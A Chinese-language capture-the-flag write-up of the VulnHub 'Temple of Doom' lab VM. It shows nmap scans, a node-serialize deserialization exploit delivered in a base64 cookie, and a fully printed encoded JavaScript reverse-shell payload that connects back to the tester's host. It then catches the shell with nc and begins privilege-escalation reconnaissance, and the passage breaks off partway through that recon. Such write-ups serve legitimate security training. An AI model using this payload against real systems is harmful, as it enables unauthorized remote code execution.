Please enable Javascript to view the contents

Temple of Doom 靶机练习记录

 ·  ☕ 12 分钟  ·  ✍️ IceKam · 👀... 阅读

VM 名称:Temple of Doom: 1

难度:容易 / 中等

注意:2 种获取 root 的方法!

下载地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/

信息搜集

获取靶机 ip 地址

使用 nmap -sn 即可探测到靶机 ip 地址。

1
2
3
4
5
6

$ nmap -sn 192.168.1.1-254
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-29 22:38 CST
Nmap scan report for 192.168.1.185
Host is up (0.000076s latency).
MAC Address: 08:00:27:55:15:E9 (Oracle VirtualBox virtual NIC)
Host is up.
  • 获取到 ip 到 ip 地址为:192.168.1.185
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

$ nmap -sC -sV -vv -p- 192.168.1.185
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-30 08:05 CST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Initiating ARP Ping Scan at 08:05
Scanning 192.168.1.185 [1 port]
Completed ARP Ping Scan at 08:05, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:05
Completed Parallel DNS resolution of 1 host. at 08:05, 0.00s elapsed
Initiating SYN Stealth Scan at 08:05
Scanning 192.168.1.185 [65535 ports]
Discovered open port 22/tcp on 192.168.1.185
Discovered open port 666/tcp on 192.168.1.185
Completed SYN Stealth Scan at 08:05, 1.57s elapsed (65535 total ports)
Initiating Service scan at 08:05
Scanning 2 services on 192.168.1.185
Completed Service scan at 08:05, 11.02s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.185.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 1.11s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Nmap scan report for 192.168.1.185
Host is up, received arp-response (0.00017s latency).
Scanned at 2018-10-30 08:05:31 CST for 14s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT    STATE SERVICE REASON         VERSION
22/tcp  open  ssh     syn-ack ttl 64 OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 95:68:04:c7:42:03:04💿00:4e:36:7e:cd:4f:66:ea (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCm9vS4Orpm7HKPXTlmMkNuL0aaGP0KU9hNXxnM8H1mWbttFgm4OX3n0HDWYS8SZJrLIG0+nyEu82RQ2Z4MsDuY85OaT+Zxo0Ax+8E+pZ/dsQhmJ+5hIRxMwG2hEG5QGNaCXPeYfplLNIxOWq/JTEyoDtu/nscwlXrJ4uE++jchxcV7mI/P0GvO3/AmgIO9tOqLW2NRiK0n54hU03qTsOGYWblexneNpG+h2RtrBbMB546Ud4KtUzn3dece7bE+0B7jzwj/OFkvYJvX0GmJMJZ3qRM5Rtz4J5U0y8bLiLdRLQboXYiLPoJ7IiUTG41ZlScX8itvK9JSHb6reHTV81Dd
|   256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEMiN8ZmA/iqZ5k4n8OZAV/LVRXb8IfG1fR2ytPKaWAYG8NUpaSGvyBwcdcelrTwkQ3YdAJFVMlYSmHUXfaj9ro=
|   256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDOa17e7aQPKX+FBRSV4VPoDc1JQ/ky5zf2gX1d0oVa8
666/tcp open  http    syn-ack ttl 64 Node.js Express framework
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:55:15:E9 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.36 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
  • 获取到 22 和 666 端口可开放。

搜集 web 信息

打开 ip:666,刷新后发现有反序列化漏洞。

1

at Object.exports.unserialize (/home/nodeadmin/.web/node_modules/node-serialize/lib/serialize.js:62:16)
  • 由于两次请求获取内容不一直,我们打开 burpsuite 看看请求。

GET / HTTP/1.1 Host: 192.168.1.185:666 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 DNT: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D Connection: close

  • 发现 profile 内容为编码,我们解码试试。

使用 burpsuite 自带的 base64 解码功能,解码后内容如下。

1

profile={"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMTIn0%3D

看了半天发现是语法错误,我们将解码内容更改为正确的再加密,重新提交。

1

profile={"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":"Friday, 13 Oct 2018 00:00:00 GMT"}
  • 提交后如果正确会获取到 Hello Admin。

漏洞利用

poc 获取与环境完善

使用 google 搜索 Node.js deserialization bug,得到 poc 利用代码,当然也有 msf 的利用方式,这里我直接使用 poc。
poc 如下代码地址:

1

https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py

这个 poc 需要一些依赖组件,使用以下命令安装:

1

python -m pip install -U "pylint<2.0.0" --user

利用 poc 反弹 shell

运行 poc 生成利用代码。

1
2
3
4
5

$ python icekamtest.py 192.168.1.122 8612
[+] LHOST = 192.168.1.122
[+] LPORT = 8612
[+] Encoding
eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,50,51,46,49,50,50,34,59,10,80,79,82,84,61,34,56,54,49,50,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))

第一次 nc 反弹

1
2

$ nc -vlp 8612
listening on [any] 8612 ...

利用 burpsuite 提交 poc 代码

将我们刚刚更改正确的参数加上 payload 并 base64 加密提交。
未加密前格式为:

1

{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":"Friday, 13 Oct 2018 00:00:00 GMT", "rce":"_$$ND_FUNC$$_function(){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,50,51,46,49,50,50,34,59,10,80,79,82,84,61,34,56,54,49,50,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}

base64 加密提交

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

GET / HTTP/1.1
Host: 192.168.1.185:666
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOiJGcmlkYXksIDEzIE9jdCAyMDE4IDAwOjAwOjAwIEdNVCIsICJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24oKXtldmFsKFN0cmluZy5mcm9tQ2hhckNvZGUoMTAsMTE4LDk3LDExNCwzMiwxMTAsMTAxLDExNiwzMiw2MSwzMiwxMTQsMTAxLDExMywxMTcsMTA1LDExNCwxMDEsNDAsMzksMTEwLDEwMSwxMTYsMzksNDEsNTksMTAsMTE4LDk3LDExNCwzMiwxMTUsMTEyLDk3LDExOSwxMTAsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEwNSwxMTQsMTAxLDQwLDM5LDk5LDEwNCwxMDUsMTA4LDEwMCw5NSwxMTIsMTE0LDExMSw5OSwxMDEsMTE1LDExNSwzOSw0MSw0NiwxMTUsMTEyLDk3LDExOSwxMTAsNTksMTAsNzIsNzksODMsODQsNjEsMzQsNDksNTcsNTAsNDYsNDksNTQsNTYsNDYsNDksNTAsNTEsNDYsNDksNTAsNTAsMzQsNTksMTAsODAsNzksODIsODQsNjEsMzQsNTYsNTQsNDksNTAsMzQsNTksMTAsODQsNzMsNzcsNjksNzksODUsODQsNjEsMzQsNTMsNDgsNDgsNDgsMzQsNTksMTAsMTA1LDEwMiwzMiw0MCwxMTYsMTIxLDExMiwxMDEsMTExLDEwMiwzMiw4MywxMTYsMTE0LDEwNSwxMTAsMTAzLDQ2LDExMiwxMTQsMTExLDExNiwxMTEsMTE2LDEyMSwxMTIsMTAxLDQ2LDk5LDExMSwxMTAsMTE2LDk3LDEwNSwxMTAsMTE1LDMyLDYxLDYxLDYxLDMyLDM5LDExNywxMTAsMTAwLDEwMSwxMDIsMTA1LDExMCwxMDEsMTAwLDM5LDQxLDMyLDEyMywzMiw4MywxMTYsMTE0LDEwNSwxMTAsMTAzLDQ2LDExMiwxMTQsMTExLDExNiwxMTEsMTE2LDEyMSwxMTIsMTAxLDQ2LDk5LDExMSwxMTAsMTE2LDk3LDEwNSwxMTAsMTE1LDMyLDYxLDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDUsMTE2LDQxLDMyLDEyMywzMiwxMTQsMTAxLDExNiwxMTcsMTE0LDExMCwzMiwxMTYsMTA0LDEwNSwxMTUsNDYsMTA1LDExMCwxMDAsMTAxLDEyMCw3OSwxMDIsNDAsMTA1LDExNiw0MSwzMiwzMyw2MSwzMiw0NSw0OSw1OSwzMiwxMjUsNTksMzIsMTI1LDEwLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCwzMiw5OSw0MCw3Miw3OSw4Myw4NCw0NCw4MCw3OSw4Miw4NCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDMyLDYxLDMyLDExMCwxMDEsMTE5LDMyLDExMCwxMDEsMTE2LDQ2LDgzLDExMSw5OSwxMDcsMTAxLDExNiw0MCw0MSw1OSwxMCwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDk5LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsNDAsODAsNzksODIsODQsNDQsMzIsNzIsNzksODMsODQsNDQsMzIsMTAyLDExNywxMTAsOTksMTE2LDEwNSwxMTEsMTEwLDQwLDQxLDMyLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTgsOTcsMTE0LDMyLDExNSwxMDQsMzIsNjEsMzIsMTE1LDExMiw5NywxMTksMTEwLDQwLDM5LDQ3LDk4LDEwNSwxMTAsNDcsMTE1LDEwNCwzOSw0NCw5MSw5Myw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDExOSwxMTQsMTA1LDExNiwxMDEsNDAsMzQsNjcsMTExLDExMCwxMTAsMTAxLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDExMiwxMDUsMTEyLDEwMSw0MCwxMTUsMTA0LDQ2LDExNSwxMTYsMTAwLDEwNSwxMTAsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMTEsMTE3LDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExNSwxMTYsMTAwLDEwMSwxMTQsMTE0LDQ2LDExMiwxMDUsMTEyLDEwMSw0MCw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTExLDExMCw0MCwzOSwxMDEsMTIwLDEwNSwxMTYsMzksNDQsMTAyLDExNywxMTAsOTksMTE2LDEwNSwxMTEsMTEwLDQwLDk5LDExMSwxMDAsMTAxLDQ0LDExNSwxMDUsMTAzLDExMCw5NywxMDgsNDEsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTAxLDExMCwxMDAsNDAsMzQsNjgsMTA1LDExNSw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDEwMSwxMDAsMzMsOTIsMTEwLDM0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTEsMTEwLDQwLDM5LDEwMSwxMTQsMTE0LDExMSwxMTQsMzksNDQsMzIsMTAyLDExNywxMTAsOTksMTE2LDEwNSwxMTEsMTEwLDQwLDEwMSw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwMSwxMTYsODQsMTA1LDEwOSwxMDEsMTExLDExNywxMTYsNDAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNDQsMzIsODQsNzMsNzcsNjksNzksODUsODQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDEyNSwxMCw5OSw0MCw3Miw3OSw4Myw4NCw0NCw4MCw3OSw4Miw4NCw0MSw1OSwxMCkpfSgpIn0
If-None-Match: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"
Connection: close

成功反弹 shell。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

$ nc -vlp 8612
listening on [any] 8612 ...
192.168.1.185: inverse host lookup failed: Unknown host
connect to [192.168.1.122] from (UNKNOWN) [192.168.1.185] 35516
Connected!
ls -la
total 40
drwx------. 5 nodeadmin nodeadmin 4096 Jun  7 23:05 .
drwxr-xr-x. 4 root      root      4096 Jun  2 23:02 ..
-rw-------. 1 nodeadmin nodeadmin    1 Jun  7 23:04 .bash_history
-rw-r--r--. 1 nodeadmin nodeadmin   18 Mar 15  2018 .bash_logout
-rw-r--r--. 1 nodeadmin nodeadmin  193 Mar 15  2018 .bash_profile
-rw-r--r--. 1 nodeadmin nodeadmin  231 Mar 15  2018 .bashrc
drwx------  3 nodeadmin nodeadmin 4096 Jun  1 13:24 .config
-rw-------  1 nodeadmin nodeadmin   16 Jun  3 16:41 .esd_auth
drwxr-xr-x  4 nodeadmin nodeadmin 4096 Jun  3 00:58 .forever
drwxrwxr-x. 3 nodeadmin nodeadmin 4096 May 30 17:44 .web

切换为 ssh 模式:

1
2
3
4
5
6

which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/sh")'
sh-4.4$ /bin/bash
/bin/bash
[nodeadmin@localhost ~]$
  • 发现并不是 root 权限,那么我们接下来要干点啥呢?

提权

系统信息搜集

首先执行一波常见搜集命令

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58

[nodeadmin@localhost ~]$ uname -a
uname -a
Linux localhost.localdomain 4.16.3-301.fc28.x86_64 #1 SMP Mon Apr 23 21:59:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[nodeadmin@localhost ~]$ crontab -l
crontab -l
@reboot /bin/node /home/nodeadmin/.web/server.js &
[nodeadmin@localhost ~]$ cat /etc/passwd
cat /etc/passwd
root❌0:0:root:/root:/bin/bash
bin❌1:1:bin:/bin:/sbin/nologin
daemon❌2:2:daemon:/sbin:/sbin/nologin
adm❌3:4:adm:/var/adm:/sbin/nologin
lp❌4:7:lp:/var/spool/lpd:/sbin/nologin
sync❌5:0:sync:/sbin:/bin/sync
shutdown❌6:0:shutdown:/sbin:/sbin/shutdown
halt❌7:0:halt:/sbin:/sbin/halt
mail❌8:12:mail:/var/spool/mail:/sbin/nologin
operator❌11:0:operator:/root:/sbin/nologin
games❌12💯games:/usr/games:/sbin/nologin
ftp❌14:50:FTP User:/var/ftp:/sbin/nologin
nobody❌65534:65534:Kernel Overflow User:/:/sbin/nologin
apache❌48:48:Apache:/usr/share/httpd:/sbin/nologin
systemd-coredump❌999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network❌192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve❌193:193:systemd Resolver:/:/sbin/nologin
dbus❌81:81:System message bus:/:/sbin/nologin
polkitd❌998:995:User for polkitd:/:/sbin/nologin
geoclue❌997:993:User for geoclue:/var/lib/geoclue:/sbin/nologin
colord❌996:992:User for colord:/var/lib/colord:/sbin/nologin
rtkit❌172:172:RealtimeKit:/proc:/sbin/nologin
pulse❌171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gluster❌995:989:GlusterFS daemons:/run/gluster:/sbin/nologin
qemu❌107:107:qemu user:/:/sbin/nologin
avahi❌70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
chrony❌994:988::/var/lib/chrony:/sbin/nologin
dnsmasq❌987:987:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
rpc❌32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
usbmuxd❌113:113:usbmuxd user:/:/sbin/nologin
openvpn❌986:986:OpenVPN:/etc/openvpn:/sbin/nologin
radvd❌75:75:radvd user:/:/sbin/nologin
saslauth❌985:76:Saslauthd user:/run/saslauthd:/sbin/nologin
nm-openvpn❌984:983:Default user for running openvpn spawned by NetworkManager:/:/sbin/nologin
nm-openconnect❌983:982:NetworkManager user for OpenConnect:/:/sbin/nologin
abrt❌173:173::/etc/abrt:/sbin/nologin
pipewire❌982:980:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm❌42:42::/var/lib/gdm:/sbin/nologin
rpcuser❌29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
gnome-initial-setup❌981:979::/run/gnome-initial-setup/:/sbin/nologin
vboxadd❌980:1::/var/run/vboxadd:/sbin/nologin
sshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tss❌59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
tcpdump❌72:72::/:/sbin/nologin
nginx❌979:977:Nginx web server:/var/lib/nginx:/sbin/nologin
mysql❌27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
squid❌23:23::/var/spool/squid:/sbin/nologin
webalizer❌67:976:Webalizer:/var/www/usage:/sbin/nologin
nodeadmin❌1001:1001::/home/nodeadmin:/bin/bash
fireman❌1002:1002::/home/fireman:/bin/bash
  • 当然我会搜索有没有系统漏洞之类的,不过这个环境并没有那么简单。
  • 于是我看了下用户发现真特么多,发现 fireman 这个用户貌似可以的。

查看联网信息:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154

netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:22              0.0.0.0:> *               LISTEN
tcp        0      0 192.168.1.185:35528   192.168.1.122:8612    ESTABLISHED
tcp6       0      0 :::22                   :::> *                    LISTEN
tcp6       0      0 :::666                  :::> *                    LISTEN
[nodeadmin@localhost ~]$ netstat -aux
netstat -aux
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
udp        0      0 0.0.0.0:bootpc          0.0.0.0:> *
udp        0      0 localhost:323           0.0.0.0:> *
udp     9984      0 0.0.0.0:mdns            0.0.0.0:> *
udp        0      0 0.0.0.0:54947           0.0.0.0:> *
udp6       0      0 [::]:33082              [::]:> *
udp6       0      0 localhost:323           [::]:> *
udp6   13824      0 [::]:mdns               [::]:> *
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node   Path
unix  2      [ ]         DGRAM                    22796    /run/user/1001/systemd/notify
unix  2      [ ACC ]     STREAM     LISTENING     19902    /var/lib/gssproxy/default.sock
unix  2      [ ACC ]     STREAM     LISTENING     22800    /run/user/1001/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     19216    /var/run/mcelog-client
unix  2      [ ACC ]     STREAM     LISTENING     22817    /run/user/1001/bus
unix  2      [ ACC ]     STREAM     LISTENING     22824    /run/user/1001/pulse/native
unix  2      [ ACC ]     STREAM     LISTENING     14894    /run/systemd/private
unix  2      [ ACC ]     SEQPACKET  LISTENING     14907    /run/udev/control
unix  2      [ ACC ]     STREAM     LISTENING     14912    /run/lvm/lvmpolld.socket
unix  2      [ ACC ]     STREAM     LISTENING     18123    @ISCSID_UIP_ABSTRACT_NAMESPACE
unix  2      [ ]         DGRAM                    19804    /var/run/chrony/chronyd.sock
unix  3      [ ]         DGRAM                    11902    /run/systemd/notify
unix  13     [ ]         DGRAM                    11912    /run/systemd/journal/dev-log
unix  2      [ ACC ]     STREAM     LISTENING     11921    /run/systemd/journal/stdout
unix  2      [ ACC ]     SEQPACKET  LISTENING     15251    /run/systemd/coredump
unix  6      [ ]         DGRAM                    11924    /run/systemd/journal/socket
unix  2      [ ACC ]     STREAM     LISTENING     22165    /var/run/NetworkManager/private-dhcp
unix  2      [ ACC ]     STREAM     LISTENING     23722    /tmp/.esd-1001/socket
unix  2      [ ACC ]     STREAM     LISTENING     19903    /run/gssproxy.sock
unix  2      [ ACC ]     STREAM     LISTENING     18122    @ISCSIADM_ABSTRACT_NAMESPACE
